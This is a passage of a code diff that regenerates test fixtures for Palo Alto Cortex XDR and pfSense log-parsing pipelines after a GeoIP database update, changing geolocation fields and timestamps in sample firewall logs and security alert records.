Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Host\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"host os\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_agent\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_agent\"},{\"pretty_name\":\"windows\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_agent\"}],\"host_ip\":[\"192.168.88.1\",\"192.168.153.1\",\"10.10.10.10\"],\"host_name\":\"testhostname-123\",\"mac_addresses\":null,\"source\":\"XDR BIOC\",\"action\":\"DETECTED\",\"action_pretty\":\"Detected\"}", "kind": "alert", "created": "2020-05-06T19:15:14.182Z", diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json index d00123405c3..37b5665ab62 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json @@ -52,19 +52,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -113,7 +108,7 @@ "event": { "severity": 4, "reason": "Info-Leak (7.7.7.7/cgi-bin/config.exp)", - "ingested": "2021-12-09T13:44:33.525006400Z", + "ingested": "2021-12-14T14:54:07.245432513Z", "original": "{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"175.16.199.1\",\"action_remote_port\":443,\"action_external_hostname\":\"175.16.199.1\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak (7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", "kind": "alert", "created": "2021-07-15T11:00:49.000Z", @@ -203,7 +198,7 @@ "event": { "severity": 3, "reason": "Suspicious executable detected", - "ingested": "2021-12-09T13:44:33.525009700Z", + "ingested": "2021-12-14T14:54:07.245434405Z", "original": "{\"external_id\":\"803fd786a6ba49c1bb642e3ba91a93c7\",\"severity\":\"medium\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1582275027631,\"local_insert_ts\":1582274996871,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":true,\"mac\":null,\"events\":{\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":null,\"event_type\":\"Process Execution\",\"event_timestamp\":1582274179588,\"actor_process_instance_id\":\"AdXokfzvxXMAAEB8AAAAAA==\",\"actor_process_image_path\":\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\gettools.exe\",\"actor_process_image_name\":\"gettools.exe\",\"actor_process_command_line\":\"gettools.exe\",\"actor_process_signature_status\":\"Unsigned\",\"actor_process_signature_vendor\":\"N/A\",\"actor_process_image_sha256\":\"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"actor_causality_id\":null,\"actor_process_os_pid\":16508,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\System32\\\\cmd.exe\\\" /C \\\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\win-install.cmd\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"causality_actor_process_execution_time\":1582274147424,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":null,\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"389045\",\"detection_timestamp\":1582274179588,\"name\":\"WildFire Malware\",\"category\":\"Malware\",\"endpoint_id\":\"7e2caa3cfcba492ec3b7468356699991\",\"description\":\"Suspicious executable detected\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":\"test-hostname\",\"mac_addresses\":null,\"source\":\"XDR Agent\",\"action\":\"BLOCKED\",\"action_pretty\":\"Prevented (Blocked)\"}", "kind": "alert", "created": "2020-02-21T08:36:19.588Z", diff --git a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml index 1fc7ce8e8ec..a722e029bfb 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml @@ -46,6 +46,8 @@ external: ecs - name: destination.geo.continent_name external: ecs +- name: destination.geo.city_name + external: ecs - name: destination.geo.country_iso_code external: ecs - name: destination.geo.country_name diff --git a/packages/panw_cortex_xdr/docs/README.md b/packages/panw_cortex_xdr/docs/README.md index a2ec3ad0721..d2a2e55b209 100644 --- a/packages/panw_cortex_xdr/docs/README.md +++ b/packages/panw_cortex_xdr/docs/README.md @@ -34,6 +34,7 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap | data_stream.type | Data stream type. | constant_keyword | | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | destination.as.organization.name | Organization name. | keyword | +| destination.geo.city_name | City name. | keyword | | destination.geo.continent_name | Name of the continent. | keyword | | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | @@ -65,7 +66,7 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap | host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | | host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | | host.ip | Host ip addresses. | ip | -| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword | +| host.mac | Host mac addresses. | keyword | | host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | | host.os.build | OS build information. | keyword | | host.os.codename | OS codename, if any. | keyword | diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml index 8a75814550d..45ab7df118e 100644 --- a/packages/panw_cortex_xdr/manifest.yml +++ b/packages/panw_cortex_xdr/manifest.yml @@ -1,6 +1,6 @@ name: panw_cortex_xdr title: Palo Alto Cortex XDR Logs -version: 0.2.5 +version: 0.2.6 release: beta description: Collect and parse logs from Palo Alto Cortex XDR API with Elastic Agent. type: integration diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml index 93c51438ae6..a1d1377021e 100644 --- a/packages/pfsense/changelog.yml +++ b/packages/pfsense/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json index 553f5b780cd..23c21e44d7a 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json @@ -9,19 +9,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -91,7 +86,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709404500Z", + "ingested": "2021-12-14T14:54:09.821721765Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -116,19 +111,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -198,7 +188,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709412800Z", + "ingested": "2021-12-14T14:54:09.821724115Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -223,19 +213,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -296,7 +281,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709421500Z", + "ingested": "2021-12-14T14:54:09.821726590Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "provider": "filterlog", "timezone": "-04:00", @@ -321,19 +306,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -403,7 +383,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709427600Z", + "ingested": "2021-12-14T14:54:09.821727007Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -428,19 +408,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -510,7 +485,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709435300Z", + "ingested": "2021-12-14T14:54:09.821727419Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -535,19 +510,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -617,7 +587,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709444Z", + "ingested": "2021-12-14T14:54:09.821727876Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -696,7 +666,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709450700Z", + "ingested": "2021-12-14T14:54:09.821728254Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32", "provider": "filterlog", "timezone": "-04:00", @@ -721,19 +691,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -803,7 +768,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709457100Z", + "ingested": "2021-12-14T14:54:09.821728656Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -828,19 +793,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -910,7 +870,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709463800Z", + "ingested": "2021-12-14T14:54:09.821729041Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -935,19 +895,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1017,7 +972,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709469200Z", + "ingested": "2021-12-14T14:54:09.821729437Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1042,19 +997,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1124,7 +1074,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709476400Z", + "ingested": "2021-12-14T14:54:09.821729829Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1149,19 +1099,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1231,7 +1176,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709486200Z", + "ingested": "2021-12-14T14:54:09.821730422Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1256,19 +1201,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1338,7 +1278,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709495100Z", + "ingested": "2021-12-14T14:54:09.821730829Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1363,19 +1303,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1445,7 +1380,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709502700Z", + "ingested": "2021-12-14T14:54:09.821731232Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1526,7 +1461,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709509100Z", + "ingested": "2021-12-14T14:54:09.821731613Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58", "provider": "filterlog", "timezone": "-04:00", @@ -1551,19 +1486,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1633,7 +1563,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709515400Z", + "ingested": "2021-12-14T14:54:09.821731992Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", @@ -1658,19 +1588,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1727,7 +1652,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709521900Z", + "ingested": "2021-12-14T14:54:09.821732481Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "provider": "filterlog", "timezone": "-04:00", @@ -1752,19 +1677,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 